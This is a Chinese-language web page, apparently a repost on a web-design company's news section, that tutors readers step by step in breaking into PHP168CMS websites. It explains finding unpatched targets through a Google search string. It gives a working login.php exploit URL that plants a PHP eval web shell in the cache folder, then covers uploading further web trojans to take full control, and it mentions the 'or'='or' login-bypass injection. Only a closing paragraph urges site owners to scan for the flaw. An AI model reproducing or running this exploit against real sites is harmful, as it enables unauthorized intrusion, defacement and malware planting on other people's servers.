資訊動態
Latest News
本文操作方法十分簡單,按照操作提示一步步來就可以完成了。不少網站在后臺登陸框輸入‘or’'='代碼就可以直接登陸網站后臺,這種方式曾經是最流行入侵方式,而今天盧松松講的是如何利用login后臺登陸文件漏洞注入代碼。
login.php(.asp/.aspx)文件一般都是作為CMS系統的管理員后臺登陸文件,這里以PHP168CMS系統為例,login.php漏洞實際上的一個注入漏洞,是利用文件代碼設計不良直接講惡意代碼直接上傳到網站目錄中。利用此漏洞可以進入網站,實行內容篡、網頁掛馬等手段。
第一步,尋找使用PHP168CMS的網站
在google中輸入“powered by php168”,然后隨意找到一個網站作為測試,主要是尋找沒有打補丁的網站。然后在域名后面輸入,例:http://www.lusongsong.com/login.php?makehtml=1& chdb[htmlname]=shell.php&chdb[path]=cache&content=& lt;?php%20@eval($_POST[cmd]);?>如果出現了登陸界面就表明漏洞被成功利用。(文中的入侵域名請換成搜索的網站域名)
第二步,讀取網站目錄,獲取網站絕對路徑
如果代碼成功執行,木馬就會保存在cache\shell.php文件中,然后下載一個“lanker微型PHP后門客戶端”,在木馬地址欄輸入 http://www.lusongsong.com/cache/shell.php,然后選擇讀取目錄,如果連接成功就能顯示出網站所在服務器中的絕對路徑。
第三步,開始上傳PHP網頁木馬
在lanker微型PHP后門的基本功能列表中選擇上傳網頁木馬,上傳的文件會保存在cache目錄中。在域名的后面輸入“cache/網站木馬文件名”就可以運行木馬了,至此已經對使用PHP168CMS系統的網站獲得了控制權,可以任意的修改和刪除。
其實存在login注入漏洞的不止PHP168一家,還有很多不知名的PHP網站源碼都有這個漏洞,如果你使用的是PHP系統,請趕快檢測你的程序是否有這個問題吧。對于PHP語言不了解的站長可以利用PHP注入漏洞掃描工具對你的網站進行掃描,例如:CASI、PHP-Mysql注入分析器、 ZBSI等工具。更詳細方法可以google一下:“如何預防和檢測網頁掛馬”。或者查看我寫過的關于網站掛馬文章。
聯系我們
高端創意建站品牌專家
|
|
|
|
|
|